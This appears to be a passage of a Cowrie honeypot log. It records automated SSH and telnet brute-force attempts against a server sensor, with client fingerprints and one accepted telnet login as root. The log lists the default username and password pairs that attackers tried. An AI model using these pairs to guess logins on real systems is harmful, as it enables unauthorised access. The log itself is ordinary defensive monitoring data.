{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:48:50.248137Z","src_ip":"212.227.125.160","session":"1ef8e9a409f7"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-26T11:48:50.416723Z","src_ip":"212.227.125.160","session":"1ef8e9a409f7"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41832,"dst_ip":"1.2.3.4","dst_port":22,"session":"79058652b3f5","protocol":"ssh","message":"New connection: 83.168.105.65:41832 (1.2.3.4:22) [session: 79058652b3f5]","sensor":"my-vps","timestamp":"2025-08-26T11:48:51.343634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:51.344476Z","src_ip":"83.168.105.65","session":"79058652b3f5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:48:51.381810Z","src_ip":"83.168.105.65","session":"79058652b3f5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:51.469174Z","src_ip":"212.227.125.160","session":"1ef8e9a409f7"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-26T11:48:51.495209Z","src_ip":"83.168.105.65","session":"79058652b3f5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:52.534810Z","src_ip":"83.168.105.65","session":"79058652b3f5"}
{"eventid":"cowrie.login.failed","username":"git","password":"passwd","message":"login attempt [git/passwd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:48:53.270574Z","src_ip":"196.251.86.249","session":"b5e0261cf46e"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:54.822020Z","src_ip":"196.251.86.249","session":"b5e0261cf46e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36494,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebde12a044b7","protocol":"ssh","message":"New connection: 212.227.125.160:36494 (1.2.3.4:22) [session: ebde12a044b7]","sensor":"my-vps","timestamp":"2025-08-26T11:48:55.429318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:55.429972Z","src_ip":"212.227.125.160","session":"ebde12a044b7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:48:55.490404Z","src_ip":"212.227.125.160","session":"ebde12a044b7"}
{"eventid":"cowrie.login.failed","username":"test1","password":"test1","message":"login attempt [test1/test1] failed","sensor":"my-vps","timestamp":"2025-08-26T11:48:55.671675Z","src_ip":"212.227.125.160","session":"ebde12a044b7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:56.741090Z","src_ip":"212.227.125.160","session":"ebde12a044b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37260,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc432dfba27f","protocol":"ssh","message":"New connection: 212.227.125.160:37260 (1.2.3.4:22) [session: fc432dfba27f]","sensor":"my-vps","timestamp":"2025-08-26T11:49:00.911798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:00.912666Z","src_ip":"212.227.125.160","session":"fc432dfba27f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:49:03.505544Z","src_ip":"212.227.125.160","session":"fc432dfba27f"}
{"eventid":"cowrie.login.failed","username":"root1","password":"root1","message":"login attempt [root1/root1] failed","sensor":"my-vps","timestamp":"2025-08-26T11:49:04.476031Z","src_ip":"212.227.125.160","session":"fc432dfba27f"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:05.529356Z","src_ip":"212.227.125.160","session":"fc432dfba27f"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":53754,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5b538f0e0fe","protocol":"ssh","message":"New connection: 83.168.105.65:53754 (1.2.3.4:22) [session: e5b538f0e0fe]","sensor":"my-vps","timestamp":"2025-08-26T11:49:06.790740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:06.791436Z","src_ip":"83.168.105.65","session":"e5b538f0e0fe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:49:06.832335Z","src_ip":"83.168.105.65","session":"e5b538f0e0fe"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:49:06.955286Z","src_ip":"83.168.105.65","session":"e5b538f0e0fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38024,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b60fa39faf7","protocol":"ssh","message":"New connection: 212.227.125.160:38024 (1.2.3.4:22) [session: 1b60fa39faf7]","sensor":"my-vps","timestamp":"2025-08-26T11:49:07.871303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:07.872264Z","src_ip":"212.227.125.160","session":"1b60fa39faf7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:49:07.936102Z","src_ip":"212.227.125.160","session":"1b60fa39faf7"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:07.996578Z","src_ip":"83.168.105.65","session":"e5b538f0e0fe"}
{"eventid":"cowrie.login.failed","username":"openvpn","password":"openvpn","message":"login attempt [openvpn/openvpn] failed","sensor":"my-vps","timestamp":"2025-08-26T11:49:08.139613Z","src_ip":"212.227.125.160","session":"1b60fa39faf7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:09.192815Z","src_ip":"212.227.125.160","session":"1b60fa39faf7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38796,"dst_ip":"1.2.3.4","dst_port":22,"session":"566795922442","protocol":"ssh","message":"New connection: 212.227.125.160:38796 (1.2.3.4:22) [session: 566795922442]","sensor":"my-vps","timestamp":"2025-08-26T11:49:13.694208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:13.696194Z","src_ip":"212.227.125.160","session":"566795922442"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:49:13.745420Z","src_ip":"212.227.125.160","session":"566795922442"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-26T11:49:14.003277Z","src_ip":"212.227.125.160","session":"566795922442"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:15.272533Z","src_ip":"212.227.125.160","session":"566795922442"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39570,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c0142f20764","protocol":"ssh","message":"New connection: 212.227.125.160:39570 (1.2.3.4:22) [session: 2c0142f20764]","sensor":"my-vps","timestamp":"2025-08-26T11:49:19.914171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:19.925771Z","src_ip":"212.227.125.160","session":"2c0142f20764"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:49:19.966192Z","src_ip":"212.227.125.160","session":"2c0142f20764"}
{"eventid":"cowrie.login.failed","username":"master","password":"master","message":"login attempt [master/master] failed","sensor":"my-vps","timestamp":"2025-08-26T11:49:20.181191Z","src_ip":"212.227.125.160","session":"2c0142f20764"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:21.234149Z","src_ip":"212.227.125.160","session":"2c0142f20764"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":53562,"dst_ip":"1.2.3.4","dst_port":22,"session":"863e0ce0b22e","protocol":"ssh","message":"New connection: 83.168.105.65:53562 (1.2.3.4:22) [session: 863e0ce0b22e]","sensor":"my-vps","timestamp":"2025-08-26T11:49:22.265967Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:22.267173Z","src_ip":"83.168.105.65","session":"863e0ce0b22e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:49:22.302834Z","src_ip":"83.168.105.65","session":"863e0ce0b22e"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:49:22.411726Z","src_ip":"83.168.105.65","session":"863e0ce0b22e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41488,"dst_ip":"1.2.3.4","dst_port":23,"session":"a08e50f829a5","protocol":"telnet","message":"New connection: 212.227.125.160:41488 (1.2.3.4:23) [session: a08e50f829a5]","sensor":"my-vps","timestamp":"2025-08-26T11:49:22.863378Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:49:22.950128Z","src_ip":"212.227.125.160","session":"a08e50f829a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:49:23.025701Z","src_ip":"212.227.125.160","session":"a08e50f829a5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:49:23.448781Z","src_ip":"83.168.105.65","session":"863e0ce0b22e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40336,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b15024144b3","protocol":"ssh","message":"New connection: 212.227.125.160:40336 (1.2.3.4:22) [session: 8b15024144b3]","sensor":"my-vps","timestamp":"2025-08-26T11:49:25.745534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:49:25.746683Z","src_ip":"212.227.125.160","session":"8b15024144b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS